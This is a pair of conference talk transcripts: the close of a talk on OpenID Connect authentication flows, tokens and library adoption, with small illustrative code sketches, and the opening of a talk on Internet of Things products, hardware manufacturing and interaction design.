That's I guess the main point here. Yes? Okay, so the question is, what does the adoption look like? So the spec has been released on February 26, 2014. So that kind of answers the question, yeah? No, there are a number of products and libraries out there already, and I will show them to you later. There's a list basically where you can look for, you know, commercial products and open source libraries and so on. Okay? So let's do the same thing now, but we're not writing a web application, we are writing a native application or a JavaScript-based application running in the browser, like, you know, a PhoneGap application or something like that, yeah? And you know what? It looks exactly the same, and I guess that's the desired outcome here, right? It says, hi, my name is client app one, yeah? I want to authenticate the user, that's why I pass you openid. I want to get back the email address. Now, since this is a native application in that example, there's a special URI, you know, that's up to you really, but many people use this oob colon slash slash scheme, for out of band. So it's something that is installed on your local device, yeah, like a native app. And again, I want an ID token. Something's missing, the response mode is missing. Obviously, for native applications, form posts don't make a lot of sense, right? So we don't say form post here, and if you omit the parameter, it basically says call me back directly, okay? And the response looks like this, and that's also pretty simple. Yeah, so the login occurs, the consent screen occurs if enabled. After all that, the identity token gets produced by the server, and then it gets sent back on the callback URI, okay? So if your application is a JavaScript application in the browser, that is basically some endpoint on a server, yeah, that will receive that.
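When the response does not come back as a form post, the values simply arrive on the callback URL, and the client (a native app watching its web view, or a JavaScript app) parses them out. A sketch with an invented callback URL:

```python
from urllib.parse import parse_qs, urlsplit

# Invented callback URL; a native app would see this arrive in its web view.
callback = "oob://localhost/callback#id_token=eyJhbGci.claims.sig&state=abc123"

# With the fragment response mode the values travel after the '#'.
fragment = urlsplit(callback).fragment
values = parse_qs(fragment)

id_token = values["id_token"][0]
state = values["state"][0]
print(state)  # abc123
```

The state is then compared against the stored value and the id_token validated exactly as in the web application case.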
If your application is a native application on a client device, you typically have a web view, yeah, like an embedded browser, and then you just catch that redirect URI and then you pull the identity token from the URL. So let me show you that as well. Let's do a native app first. Yeah, login, or login with profile maybe, doesn't matter. So that's an embedded browser now, yeah, showing the login page. I login with Alice and here's the consent screen, I say yes, and now that's the return URL, and as you can see, here's my identity token, okay? How does that work in code? You see I have a separate window here, the login web view, and this has just one control called the web browser, yeah, and then basically you can handle the navigating event, and whenever you see your callback URI being the next URL, yeah, here where the URI starts with the callback URI, you know authentication is done, and you can now grab the identity token from the URL, and that is how it manually works. Again, many operating systems have built-in libraries for that, like Windows 8 has the WebAuthenticationBroker, and Android has a native library, to make that easier, okay? But that's how it works in practice, and the nice thing is obviously that the application is not involved at all, right? I mean, the only thing the application knows is that's the URL to go to, and whenever they call me back on this URL, they are done, and what happened in between, we don't care. So login only, we could also login with Google now. The application doesn't care about that, but now we have an identity token that basically got sourced from a Google account, no? Okay. So the next thing, which is an important feature, now that we have authentication done, right? So that was our WS-Fed/SAML replacement. Now the next part is, how do we do API access?
Yeah, so I mean, some applications might not care about that, some might only care about API access, but OpenID Connect allows us to do both at the same time, yeah? And the only difference, and that's quite nice, is you have to ask for more scopes, okay? OpenID Connect defines a set of identity related scopes, and you can define a set of scopes that relate to your APIs, okay? So what that basically means is I want to authenticate the user, I want his email address, and I want an access token for API one and API two, okay? And you also say give me back an ID token and give me back a token. And then once we have the access token on the client, we can use it, oh, sorry, and they send it back like this, there's the identity token and there's the additional token here, okay? So we now have two tokens, yeah? One is for authenticating with the client, one is for accessing the API back end. And then we can just use the token, put it on your authorization header, for example, and access the back end service. So let me show you that as well. So here we do login with profile and access token, let's stay with this client here. So let's use another, no, it doesn't matter really. So now you see the consent screen says, okay, here are some scopes related to your identity, yeah, like your user ID and your basic profile. And here are some scopes which relate to API access on your behalf, okay? And we can say allow. And now what we get back is an identity token. And if I can find it somewhere, an access token, okay? And we get told how long this access token is valid and so on, okay? So we can also look at the access token. Now what's inside of that? Basically there's the issuer again, the audience, which this time is not the client but the back end, which makes sense, right? The not-before, the expiration, the client ID, the scopes that the user has consented to, yeah?
The subject ID again, the authentication method, this time it's external since it's coming from Google, and the authentication time. And this is what you would use then to send to your back end service. How does the back end service look? Here's my startup. So there's middleware for validating JSON Web Tokens, yeah? So we say, okay, we want to make sure this token comes from this issuer, has this audience and was signed with this public key. And as long as this is true, we can now access the service back end with this token. So let's try that as well. Okay? And again, what this service is doing is really just, it grabs the current user principal, which has all the claims that were on the access token, and echoes them back, so we can see that it actually worked. So when we go to our call service button here now, you'll see that we get back our claims from the service. And again, how did it work? We just added the access token to the authorization header and sent it along. Cool. Oh, the same thing that we've just seen, maybe in JavaScript. Where is it? Yeah. So it's the same client as the WPF client, yeah? We can say login only, for example, so we only want to authenticate the user. I'm too lazy. Okay? So that gives us back the identity token. Now, again, there are libraries for JavaScript that allow you to validate the JSON Web Token, make sure the signature is valid and all these things. So the user is authenticated with the client, yeah? Or we log in with profile and access token, yeah? We get a different consent screen, yes, allow. And now we have two tokens. And again, same purpose, you first validate the identity token, then you take the access token and send it to your back end to get access to the service on behalf of the user. Okay. The last scenario I want to show you is, how about long-lived API access, yeah? So now what we've seen is we asked for two tokens, right?
One was the identity token, one was the access token, and the access token has a finite lifetime, yeah? I mean, it's totally up to you. You can make it live for 10 minutes, for one hour, for one year, whatever, yeah? Obviously, as you know, the longer the access token lifetime, the bigger the exposure of that token, you know, someone could lose his device and it's on there, it's valid forever, stuff like that. But there's basically a way to get long-lived access without having to issue very long-lived access tokens, and this is called refresh tokens. And again, for everybody who was in my OAuth talk, that's a concept from OAuth, that's nothing that OpenID Connect invented, yeah? But basically, once you switch to this thing called the authorization code flow, which means we don't have a response type of token anymore or ID token, but code, then you don't get back the token directly, but they send you a so-called authorization code, yeah? And that looks like this, yeah? And then the application has to make a round trip on the server side, yeah, to basically swap the authorization code for the actual access token. Or in other words, what they try to do here is that the actual access token is never being transmitted via the client's computer, but only via, you know, a direct connection between two servers, SSL, trusted, and so on, yeah? And now you get back two tokens, actually. One is the short-lived access token, which might only be valid in this case for one hour, and the other is the refresh token. And then, when the access token has expired, you can send back the refresh token via the same connection here, this one, re-authenticate the client, not the user, the client, yeah, and get back a new access token that you can now use to re-access the service, okay?
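The code-for-token swap and the refresh step described above can be sketched end to end. Everything below is illustrative: the client ID, secret, token formats, and one-hour lifetime are made up, and a real server would also bind codes to redirect URIs and sign its tokens.

```python
import secrets, time

class ToyTokenService:
    """Sketch of the authorization-code + refresh-token exchange:
    one-time codes, short-lived access tokens, long-lived refresh tokens."""

    def __init__(self, access_lifetime=3600):
        self.access_lifetime = access_lifetime
        self._codes = {}            # one-time authorization codes
        self._refresh_tokens = {}   # long-lived, bound to client + user

    def issue_code(self, user, scope):
        code = secrets.token_urlsafe(16)
        self._codes[code] = (user, scope)
        return code

    def redeem_code(self, code, client_id, client_secret):
        # Server-to-server call: the client authenticates itself and swaps
        # the code for a short-lived access token plus a refresh token,
        # so the access token never travels via the user's browser.
        self._authenticate_client(client_id, client_secret)
        user, scope = self._codes.pop(code)  # codes are single-use
        refresh = secrets.token_urlsafe(16)
        self._refresh_tokens[refresh] = (client_id, user, scope)
        return {"access_token": self._access_token(user, scope),
                "expires_in": self.access_lifetime,
                "refresh_token": refresh}

    def refresh(self, refresh_token, client_id, client_secret):
        # Re-authenticates the client (not the user) and mints a new
        # short-lived access token.
        self._authenticate_client(client_id, client_secret)
        owner, user, scope = self._refresh_tokens[refresh_token]
        if owner != client_id:
            raise PermissionError("refresh token belongs to another client")
        return {"access_token": self._access_token(user, scope),
                "expires_in": self.access_lifetime}

    def _authenticate_client(self, client_id, client_secret):
        if (client_id, client_secret) != ("mvc.client", "s3cret"):  # toy store
            raise PermissionError("unknown client")

    def _access_token(self, user, scope):
        return f"at-{user}-{scope}-{secrets.token_hex(4)}"
```

The important property the sketch preserves is that the refresh step re-authenticates the client, not the user, which is exactly what lets the session outlive any individual access token.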
And again, this is really just in there because it is based on OAuth, and OAuth already had that feature, so OpenID Connect just added the ID token stuff on top, but in combination, you can now basically use them together, okay? Cool. So that's, as I said, it's really simple, yeah? It's not that much to learn how it works. So the question was, what's the adoption rate, yeah? So when you go to the OpenID Connect homepage, openid.net slash developers, you basically see the current state, yeah? It's always divided into: is it an identity provider or is it a relying party? So the relying party would be a library that you use to connect your application to the provider, and the provider is the server piece, okay? So there's an Apache mod, obviously, there's a C# implementation, I know that one. There were a couple of Java implementations here. There's PHP, there's Python, Ruby, and there are commercial products. Auth0, the guys having a booth outside, have a software as a service offering, for example. Azure Active Directory from Microsoft has an OpenID Connect endpoint. PingFederate is a commercial product, and if you scroll further down, you see libraries for validating and creating JSON web tokens. There's one for C# from Microsoft. There are Java ones. There's a JavaScript one for the browser and for the server side using Node. There are Ruby, PHP, Python ones, and so on. So it's pretty okay already given that the spec is only four months old, yeah? But it was in development for a pretty long time, so we knew what was coming, yeah? The other interesting thing is there's this Open Source Identity Systems group. This is like an organization, and what they do is they do interop testing. So if you have an implementation of OpenID Connect, either a relying party library or a provider, you can go to them and say, hey, can I take part in interop testing?
And then, you basically, they do workshops and there are also tools to record tests, because you know, one of the main goals of Open ID Connect was interoperability. We don't want the Facebook Open ID Connect and the Google Open ID Connect anymore. We want one Open ID Connect and just make it work, yeah? And here are some, you know, the who's who of identity and they, you know, try to throw packets at each other and make sure they all work together, okay? So that's the other thing I want to show you. And the last thing is our implementation of that, which is open source, it's free, it's on GitHub, it's currently in preview mode. So it's not even a beta version, I would say, yeah, it's preview mode. All of the demos you've seen today, you know, we're running on the code that you can download. And if you are interested in that, you know, have a look at it, try it out. All of the samples I've shown you today are part of that repo, all the sample client applications and so on, all the code is in there. Try it out, give us feedback, file some issues. If you find a bug, send me a pull request or just give us feedback in general. And I would say, what time is it? Oh, we have ten minutes. So are there questions? Yeah? So the question is, with the current templates, they implement Google and Facebook authentication directly in the application, right? So I mean, you know, that's just bad style. Yeah? I mean, the thing is, yeah, we want to externalize the authentication, but that is not all you need to do. Because let's say you add Google authentication to your application, then when the Google user comes back, he's still a Google user, right? I mean, you don't want to write applications that are free for all Google users. You want to use Google as an authentication mechanism. And once the user has authenticated with Google, Google will send you a unique user ID so you can recognize the user again when he comes back. But at this point, you want to make him your user, right? 
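The "make him your user" step being described, recognizing a returning external (e.g. Google) subject ID and mapping it to a local account, is the logic you would otherwise copy into every application. A minimal sketch of it, hoisted into one place; the class and field names here are made up for illustration, not any real identity server's API:

```python
class ExternalLoginRegistry:
    """First time an external subject ID shows up, create a local account
    for it; on later logins, recognize it and return the same local user.
    The external provider handles authentication, but the user is yours."""

    def __init__(self):
        self._map = {}   # (provider, external_sub) -> local user id
        self._next = 1

    def authenticate_external(self, provider, external_sub):
        key = (provider, external_sub)
        if key not in self._map:
            # Provision a local account linked to the external identity.
            self._map[key] = f"local-user-{self._next}"
            self._next += 1
        return self._map[key]
```

Written once in the provider, every application behind it gets the same mapping for free, which is the whole point of externalizing authentication.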
And not keep him as a Google user. Yeah? He still can use Google to authenticate. Yeah? So you don't have to start a password. Yeah? But that's the code you have to write. And if you have five applications with Google logins, you write this code five times or copy it. And the idea with an OpenID Connect provider or an identity provider in general is that you hoist this logic to a central location, you only write it once and make it available to all of your applications. So it's not a matter of Microsoft switching to something, it's a matter of what is your application architecture. Yeah? But Microsoft has now with the new Katana release OpenID Connect middleware, which means you can use the existing templates to connect to arbitrary OpenID Connect providers which are compatible with Microsoft implementation. Okay? Anything else? Yeah? So the question is you are having a number of applications and some would use the OpenID Connect one, some would use Google. Would that work? Yeah. I mean, is it possible to configure it on one identity server? So when you establish trust to Google, does it apply to all of the applications? Mm-hmm. Mm-hmm. Ah, okay. So the question is when, so basically the login page, will it always show Google or can you per application say like, this should only do Google, this should only do local? Yes, it is, but not yet. It's on our to-do list, it's actually in the issue tracker. The protocol allows that you can pass in a so-called login hint to the provider and based on that hint, you could go directly to Google, don't even show them the login page to have the Google button to click, but go directly there, come back and go back to the application. Or you can configure it per application which ones you want to make available on the login screen. But yeah, it's not implemented yet. Okay, anything else? Oh, sorry. So regarding OAuth, how well does ADFS work with it? So the question is how good is the OAuth support in ADFS? 
So you need ADFS, and I got told today that I'm wrong calling it ADFS version three, it's called ADFS for Server 2012 R2. That is the minimum version you need because that is where they implemented OAuth. And I think they implement code flow and implicit flow for OAuth, but obviously, as the first two letters of the product name imply, it's only for Active Directory users. So if your users are outside of Active Directory, then ADFS is not the right solution, at least not for authenticating your users. Yeah? What do you mean with local authentication methods? Okay, so the question is how hard would it be to teach identity server a new authentication method? So that's a good question. We have an interface called IUserService which has a method with access to the request and all kinds of things. We tried it with, it works well enough for two factor authentication for example, but try it out, give us feedback if you hit any blockers. I'm happy to change that, yeah? Okay, then I guess, who's going to the boat cruise tonight? Is it still raining outside? That's good. Then have a nice evening and thanks for your time. Thank you.
OpenID Connect is here – and it’s here to stay. This suite of protocols makes federation, single sign-on, session management, discovery and management feasible across arbitrary client types and platforms. It is also a welcome simplification compared to archaic WS*, XML and SAML technologies that made interop often complicated. Dominick walks you through the various bits and pieces – and along the way might even release a new open source project that implements OpenID Connect on the .NET platform ;)
10.5446/50603 (DOI)
Hello, can you hear me? That's working. That's definitely not my voice I can hear. Hello, thank you for coming. I've never been to a developers conference before, so I was a little bit scared. So you're going to have to forgive me that the last time I wrote a piece of computer software or code as some people talk about it, it was about four and a half years ago and even then it was pretty straightforward. So I did struggle a little bit to try and convince the organizers that what they really needed was my CTO who could talk to you about actual software, but they insisted that I was what they wanted. So I'm going to just talk a little bit about my company and what we do and some more general themes around this word that's come about called the Internet of Things. So my company is called Berg. We are based in North London. We used to be a design agency. We founded in about 2005. We had a kind of hybrid model. So we did work with technology and media companies as well as making our own software and products. And when you're an agency, our business model was basically every sort of three months. You have to look in the bank to make sure there's enough money to pay everyone and then you go out and you speak to some very rich companies to try and make them marginally richer in exchange for money which you charge for the time of the human beings you have in your company. And that's one business model. And then we decided that we were so clever we were going to make our own product. So we took venture capital. And for those of you who don't know what venture capital is, there's probably no one, but just bear with me because it was fairly new to me. Basically there are a bunch of extraordinarily rich guys and they know even richer guys but the guys up here are the kind of people who like manage the property portfolio for the Vatican or the whole of the New York Police Department pension fund or whatever. 
And they look at their sort of four trillion dollars and they think, I tell you what, we'll put most of this into like safe investments and we'll just take a few hundred billion and spend it on like high risk nerd stuff and hope it turns into Facebook. And we're one of those. So the downside of this is you can't have like an industrial chic studio in North London anymore. You have to go somewhere really shitty where the rent is cheap and like sort of like nylon carpets and polystyrene ceiling tiles. And so now we live here. And really the best way I can characterize this office is this. Both everything from the aesthetic to the kind of heart and soul that goes into keeping the building alive. So it's spiritually enriching as an environment. But in many ways I'm enjoying our new direction. So one of the things we've always found quite difficult to do is to define what we do because we're mostly a design company. But in the room with me as someone who was trained as a designer also is a computer scientist and a good one at that. And people who talk about ground bounce and all the weird things that happen at the physics level in chips and radio interference in certain spectrums and certification of kind of small pieces of plastic with copper tracks running through them. So there are also some sort of scary minds sitting quite nearby. But to talk about connected products I thought I'd just show this graph because there's a lot of words and historically certainly in academia people have been talking about a space where consumers would purchase internet connected products for some decades now. And you end up with words like ubiquitous computing. That was big in some time in the 90s. And now we've got this thing internet of things and they've really got far more syllables than I think they deserve. But in my opinion you've really got three things going on. One is you've got electricity which is weirdly the hardest one to come by in my view. It's really rare electricity. 
It's hard to make. It's hard to keep. And it's kind of why I think people quite like to put the internet in a fridge because you know you've got a fairly confident power supply. And it's in my experience of working with large manufacturers is many of the reasons why your phone doesn't do as much as it could. Like computationally I think your phone could do a lot more than it does but power management is one of the biggest problems with it. So electricity is a bit of a dog really. It's the one that people don't think about very much. Then you have some kind of connectivity by wires or radio. There are some other kind of fancy pants methods but really you kind of want some bits and bytes going between one thing and another over distance. And even that's going to be wires or radio. And then you need some like humans, some sort of bags of meat with their capacitive fingers and their wallets spending things and poking at capacitive screens and stuff. And somewhere in the middle of that there's like connected products. And that's broadly where I find the actual practical work that I do on a day to day basis happening. So we made a product. One of the things we did after sort of six or seven years of consulting with manufacturers and technology companies and media companies which is where this kind of world for us at least seems to have converged. We decided that we had to kind of try and actually make one ourselves. If we wanted to consult and tell people, yeah, you should be making connected device or use this kind of system or think about that or manufacturers like this and those sorts of things. So we should actually have a stake in the game ourselves. So we scraped up a load of money and we made a product called Little Printer. And it is a domestic product. It's a thermal printer that sits in your home and you use a website to subscribe to subscription content. So news headlines, four square check-ins, social media. Some things are really practical like travel data. 
Some things are really social like Instagram photos. Some things are just weird like people do comics and kind of odd stuff like that. And you can also use it like a tiny kind of portable printer for your phone. So you just take photos and it sort of prints out like a kind of magical fax, like a kind of long distance Polaroid. Anyway, it also prints its own face. And that's my favorite bit about it. But it's one of the things that's allowed it to kind of catch on as a kind of design icon in this space. And it's been very warmly received. Anyway, we manufactured them. And there are thousands of them floating around in the world with people pressing the button on the top and printing out little bits of information and puzzles and things for their kids and all that kind of stuff. And it exists. And it was, well, one of the things it does is that it's quite nice is that conferences like this, it prints out kind of itineraries. And so it's very timely. It's kind of funny because in the media universe, you seem to have these two quite convergent, quite separate sort of forces at play at the moment. One is you've got this obsession with like resolution, immersion, super high kind of very, very high definition, high resolution kind of information in media. Things like the hobbit being shot at like 96 frames a second, like native in the camera or Oculus Rift and this kind of super immersion just like drowning in pixels, like being punched in the eyeballs with Photoshop. And you've just got, you've got sort of IMAX kind of Samsung, they're kind of big curved 4K TVs. And then the other hand, you've got like four guys in a basement in New York making easily the worst photography app in history and then selling it to Facebook for a billion dollars. And it's just a bit odd because there's this second media universe which is where 140 characters is worth more than an entire newspaper. 
And it's because it's timely and personal and specific that it arrives from someone at that point is worth more than, you know, the greatest journalists of our age writing about war. So it's a kind of odd, it's a kind of odd time in media that you have these two universes. Anyway, Little Printer speaks very much to that kind of light, timely, low resolution universe where the quality of the print isn't what matters, it's that it arrives at that moment. And of course there's a business version so now it turns out that actually loads of people who have to deal with thermal printers as part of their businesses were banging on the door saying can we have one without the stupid face please? And it's basically because you don't need any local infrastructure for it, it's just it's got a web API like in the thing. So you turn it on, Wi-Fi, Internet. There's no like, you know that thing when your company is like Cisco and things like that or NCR, these giant middleware solutions and someone's got to have like a server room just to run like a dot matrix display. And here you just go to your website, sign in, tell the printer what you want to do, just point your APIs at it and it prints it out. So it's basically like a tiny, very, very low resolution browser with a very slow refresh rate. That's kind of one way to think about it. So what is an IoT? So just to kind of get a sense and this may be, again, speaking to people, I sometimes do this talk to like design students where I'm like it's an API, write that down. So forgive me if some of this feels like it's preaching to people who know more about it than I do. But sometimes I think it's worth just describing a few things that kind of give you a smell of what the space is like. This is a product called Glowcaps and it's, I quite like it. It's produced by a guy called David Rose who's ex-MIT and it's a very successful company. It's been sold to private equity since it launched and it's a medicine bottle top. 
And it's probably, I think, the bill of materials or the cost of the system to any given medical consumer, as in any patient, because it's issued by doctors in the US. It's given out with the medicine as part of the prescription. I think the cost of the system is something like $200. But the cost of a psychotic person not taking the drugs that keep them sane is so high legally and punitively and in terms of insurance that it's worth giving everyone an entire system to record whether or not they're taking their medicine. So when the bottle top gets opened and closed, it sends a message to the system to say that you've taken your medicine. If you don't take your medicine, it like phones the police or your mother or gives you a badge on Foursquare or whatever the system is that it's been tuned to. The second one is Fuel, which has since been discontinued by Nike, but no doubt the close relationship with Apple will mean that in some respect it continues. But it's a kind of quantified-self product that measures your activity and reflects it back to you so you can tell how unfit you are. And the last one, another favorite of mine, is the Kindle, which is another weird product because e-ink is like the lowest resolution, profoundly expensive technology. I mean if you go to factories in China, there are only three factories in China that produce e-ink displays, and the e-ink display on the Kindle is easily 90% of the bill of materials of that product. It costs way more than the 3G component. It's literally the most expensive part, and the Kindle is sold broadly at cost, a little bit of profit maybe, but it's really expensive compared to an LCD display. The only advantage to it is that it's not backlit so you can read it in reflective light, and it doesn't consume any power when you're not changing it, which are both very, very useful things, but it's incredibly expensive, so it's an odd product to choose.
Unless you're Jeff Bezos, in which case you've just convinced millions of people to buy a shop. Like, when we look at the Kindle, it's like, hey, neat, book-reading stuff that works in the light and you charge it once a month. He looks at it like he's just sold you a buy now button, and it's quite extraordinary. Anyway, so there are some examples of things in that space. Some things are a bit less discussed, which is a bit odd in IoT, because IoT is a bit of a funny word for things that haven't ever quite succeeded. You know, it's a sort of weird ghetto, a park of student experiments and Arduino hacks. But there are actually quite large grown-up service businesses that use stuff which is hardware in the world, and if you look outside of that kind of odd consumer realm of big clunky Samsung gear and all that kind of stuff, then you get some interesting things. I mean, GoPro is kind of a wearable. It doesn't have a persistent connection to the internet, but the images that you make on it you use somewhere else, and it's a profoundly successful company. The second thing is there's a business in the UK called Just Eat, which is really very successful, and what it does is it aggregates restaurant menus from takeaways and delivery companies, like pizza stores and Indian takeaways and Chinese takeaways. It presents them to you on a website with a consistent format. You search by your postcode and say, I want Chinese food. Yeah, have that one, that one, that one. You press go. It faxes the restaurant kitchen, and the chef gets that fax and presses OK. You get a message back on your browser that says the chef has received the order, and then that receipt turns up at your home with the delivery. So it's just, it's like the Uber for takeaways, if you know what I mean, but it needs this printer in the kitchen, because there's not going to be an iPad screwed to the wall in the restaurant kitchen. They're just not going to do that.
So weirdly, it's actually an essential component of a business which is not really about things at all. It's just better if there is one. So this is Shenzhen, and it's a region in China where loads of things get made. I'm sure you've heard of it, Foxconn live here, so do most of Flextronics' manufacture, so it's basically where all of the kind of junk screens that we click on and poke at get made. And it's very big and very weird, and it's odd how little I think one understands as a kind of Western consumer of what goes on in the production and fabrication of the things that we regard as the actual stuff of consumer electronics. And because we made a piece of consumer electronics, we had to go there and manufacture it, and it, for me, is easily one of the most miserable processes available. Like, software is really hard, but manufacture is so miserable. Basically, sort of anecdotally, I think you could say with manufacture you spend a lot of money and time designing something as you'd like it. So you think, okay, this is my product, and you've prototyped it, you've had the manufacturing engineers in, you've done all the smart thinking, and you put it there. And then the manufacturing process starts, the industrialization, it goes to the factory, you commit to spending about £250,000 for 10,000 of something exactly like this but a little bit more shit. And then what you have is 10,000 of these. You still don't have any money, then you've got to sell it. You know, really you can see why you'd rather make Angry Birds and just kind of go, upload, and then sort of everything else seems to take care of itself. Anyhow, this is an injection molding machine making the back of Little Printer.
It's a 40 ton machine, which basically means you get a bunch of bits of coloured plastic and you put it in a hopper, you heat them up to some hundreds of degrees, and then you put 40 tons of pressure behind it, because plastic only gets to the consistency of cold chewing gum when it's really hot. It's not like liquid, you're not really injecting liquid, you're forcing cold chewing gum into a metal box in order to make a tiny plastic shell, and there it is. And two brothers run that factory, one does the tooling and one does the injecting. It's very strange, China, in that there are lots of operations in manufacture which are like little family businesses, like corner stores or something. It's not like there are just these huge glittering factories everywhere, full of robots. You have to make this stuff. Obviously, this is the electronics bit, circuit boards, and this is where you get all the poisons that screw up all the rivers, it comes from this part, and you have to add a lot of copper, sat around in rows, filled through other bits of copper. This is a room in Eastern Europe where we do all the electronics assembly, with billions of tiny robots, pick and place, populating all of your electronics, and then you get these brilliant machines where you've sort of semi-glued on all your electronic components and then you just shoot this torrent of hot solder at your circuit board and it kind of glues onto the feet of the electronics to bond permanently the components that you have there. That's literally a liquid jet of solder just firing up, and you get these fantastic processes that are completely opaque in normal circumstances. If you live in the West, governments are particularly tetchy about producing really bad electronics with radio in it.
If you make a microwave that's a bit leaky, it doesn't go down very well for anyone, or your hair falls out, or if you make a radio that's not great, then aeroplanes start falling out of the sky because you ruin their traffic control. That's not good. So there's a very, very aggressive testing process where you have to take products to little rooms like this with these funny walls and Faraday cages and shoot them with stun guns to make sure that they restart properly and don't release some kind of weird radiation, even if it's just noddy Bluetooth. That's not a lot of fun either, and it's expensive. The nice thing about those problems in manufacture is that although they're miserable and expensive and nothing brilliant can really happen, they're at least linear. When you've done them, they're done. You just turn the handle now. We want to make more Little Printers, you make a phone call, credit card, they turn up in the post. Like it's just done. Whereas software always feels a little bit like you've never finished. It feels a bit like manufacture is bacteria that you can kind of cure. Software's like a virus that never really goes away. It's like cold sores or something. It sort of comes back every now and then. For me, it's a much more serious problem, in spite of the fact it's more familiar to me and the people I work with. This is Bill Verplank. Bill Verplank's got one of those brilliant CVs, like 12th employee at Apple. His first job when he left industrial design college in the 1950s was to go and humanise Martian environments. Because back when NASA thought it was the future of technology, do you remember when people cared about space instead of just pictures of their food? And NASA thought they were going to use all their money to colonise Mars and the government would just back them indefinitely. They were worried that the thing about astronauts is they're all basically soldiers. That's what an astronaut is.
You basically get the smartest guy in the air force and stick him in a space suit, and that's how you get astronauts. But you can't populate Mars with just smart soldiers. You have to send teachers and nurses and kids. And the problem with Mars is it's a giant red desert with a 17-hour day. So they were worried that they'd send everyone there and then they'd be having these kind of horrible psychotic episodes and kill each other in some kind of horrible Columbine massacre. And so they hired Bill to make it nice, to make sure Mars was nice enough. Anyway, he invented the term interaction design with Bill Moggridge at IDEO sometime in the 80s. So he's quite an important figure. And he did this drawing. And this is a drawing of an interaction. So there is our human, bag of meat, capacitive finger, etc. Doing things to that ball. That ball is your product, the abstract thing, the system that one is designing. And that thing has got handles and buttons. And back then, there really were only handles and buttons, sliders, dials. You had some fairly straightforward analog inputs. This was before computer vision and capacitive surfaces. But still, there are only so many things you can do to a product to tell it something. And then that product manifests stuff. It gets cold or hot or it beeps or the engine turns on or it goes left or whatever it does. And that manifests back to you and you feel that with your eyes or your ears or your hand or whatever. And then in your brain, you have a kind of map, a sort of map of the system. And if you think about driving a car, driving a manual car, you do sort of learn it like that. You have an understanding of things, and you kind of know, even though you've never done it, that if you're doing 60 on the motorway and you slip it into reverse, nothing great is going to happen. So it sort of works as an idea of how that happens.
But for me, phones have completely ruined this paradigm, and this model no longer has any real value left. And that is because when you're using your phone, you're not really just using your phone. You're kind of using my phone a little bit, in the way that these systems work. And as I'm on my phone, I don't really get a sense of the edges of the device anymore. When I'm talking to Siri, I'm not completely convinced that I'm talking just to this phone and not to a server farm that Wolfram Alpha owns, parked in some corner of the desert in Texas. You know, or when I'm asking Google search, it's not like the browser is answering how old Barack Obama is or where the moon is or who was in The Dirty Dozen. That's going somewhere. So the edges of the machine don't quite feel the same. And think about something like Twitter, it's really integrated into the phone now, notifications appear, or Facebook and photos, that's on the phone. I mean, that's as much my understanding of that as a product as the kind of going into the menu to change the language to Finnish or whatever, you know. It crosses computers, and the edges of that system aren't clear. And some people get upset by it. So if you swear on Twitter, it appears somewhere, privacy is weird, you never quite know where something is going to get seen. What happens if someone tags a picture with you in it on Facebook, does that appear on someone else's phone? It's this constant maelstrom as the services and the UI and the design of these things actually start to get into a kind of weird, brilliant mix. But it certainly isn't like driving a car, where you put the buttons and the order in the menu, it isn't quite the same in terms of relevance. So that doesn't work. Plus you've got brands in on this now. Companies and systems and not even humans on the end of these lines.
I got this SMS in Oslo back in February 2009. You can see how old the phone is. And this is normally where I get told off by my mother for not phoning her on a Sunday. And here we are, it says: welcome, you're flying London City to Oslo, check in for some SAS flight, just reply yes. So I said yes. It says: you are checked in. It's completely bizarre to me. What have I just done? This is not UI design. There's something else going on here. So: products apart, systems. I don't want to run over time. Representing systems is hard. And for me, if you are working in the field of interaction design or design for software, any kind of design where human beings have to walk up and poke things or things happen to them, no matter what you're doing, essentially at some deep level the nature of software in its abstraction is that it is invisible, because at its deepest level it's maths, as you all know far better than I do. You know, one holds models of how these systems work, and they quite often go to some extreme lengths, like graphical user interfaces or windows or trash cans or whatever, to make some sense of metaphors and representations to humans so that they can operate meaningfully on the functions that you've provided for them. So making representations of invisible systems is kind of what design in software is. So I'm sort of channeling an old colleague of mine here, Durrell Bishop, who's a very seasoned interaction designer and worked for a long time at Apple. And we always talk about this thing about cash. And there's unfortunately no one in the front row, so I just have to imagine that there's someone sitting there. But this is a pound coin. It's worth 10 of your Norwegian kroner, approximately, and it's mine. We all know that because I just got it out of my pocket.
But if I put it here and there was someone standing there, it suddenly feels a little bit less like mine and a lot more like theirs. You know, I'm just a little bit nervous standing here with it over there. I might forget it. It's not really mine, but it's definitely my money. Now if that person picked up that coin and put it in their pocket, there's real grounds for dispute. And if they give me back a different pound coin, have they stolen my pound? Now if I left my shoe there and they picked it up, they'd just be holding my shoe. That's all. So there's something unique about cash, in that cash is essentially a component of a system. It's a physical token. There's all sorts of things it tells you. It tells you it's British, because it's got the Queen and some unicorns and all that imperialist stuff on it. And it tells you what it's worth. It's a pound. It's not 10 pence. It's not 50 pence. It's a pound. So it has some indicators. Even its physical materiality tells you it's a pound, because it's quantified and qualified by the state. But it doesn't tell you who owns it on its surface. So it's a social system as much as it is a technical one or a formal one. And there are others, but I don't want to bang on. All this is to say that there are systems all around us that aren't really to do with software, and they exist. And car insurance, that's another really weird one. I sort of need it to drive, so I phone up some company, one of several that are supposed to be in a market, and I give them a little bit of money that's based on something to do with me and some analysis of risk, on the promise that they might give me back the value of the damage to my car should something happen, if they believe that is what happened. And you need that, but it isn't represented anywhere. But it is on my car, I mean, in the sense that my car is covered.
So there's just this odd thing of belief and systems and sociality that sometimes software doesn't formalize, but that we still live with. So this is a very nice quote from Durrell: to use something, we have to be able to perceive it. I don't mean see it, necessarily. I'm not saying everything has to be graphical or everything has to be procedurally laid out or represented literally. But this is just a very nice example of some user interface. For one thing, it's on the side of one of those giant articulated cherry pickers, we call them. They're platforms on long pneumatic arms that mean people can go and chop the tops of trees off or clean high-up windows. And you can see there, next to the buggy, that everything just has a little joystick at each joint in the articulation of the arms. So you kind of drive the whole thing by just sort of moving it around. That is a fabulous example of interaction design, as far as I'm concerned. Now this is so weird. And you guys are going to know more about this than me, so it's not going to be weird to you, but you just have to suspend yourself and pretend you haven't done computer science degrees. You don't know what pipes are, or arrays, or scary maths, or algorithms, right? Just pretend you're me and you went to art school twice and that's how bright you are. Right? So you go out and you buy a Macintosh like this one, just like this, or you go and buy a Windows PC, and you hear in the office this rumor, and someone's doing something and they're typing into this weird black window and stuff's happening somewhere else. And you know, what are you doing? And they whisper the mythical magical word: Python. And you're like, Python, what? And you now know this magical word. That's the only way to find out about it. There's nothing in the computer. You know, if you want to launch Photoshop, you kind of look for this icon, or TextEdit.
